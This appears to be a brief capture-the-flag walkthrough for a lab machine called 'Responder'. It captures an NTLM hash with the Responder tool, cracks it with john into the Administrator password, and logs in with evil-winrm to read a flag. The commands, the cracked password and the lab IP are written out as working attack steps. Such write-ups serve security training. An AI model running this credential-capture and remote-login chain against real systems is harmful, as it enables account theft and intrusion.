Responder

January 11, 2024

sudo vim /etc/hosts

Add the ip address of the box and then the site name for us to access the site.

Then visit other the languange of the website

cd Responder
sudo responder -I tun0

after you put your ip in the url then you will receive the administrator credentials

Use john to crack the password for this NTLM hash

ruby evil-winrm.rb -u Administrator -p badminton -i 10.129.71.102
more flag.txt

Last updated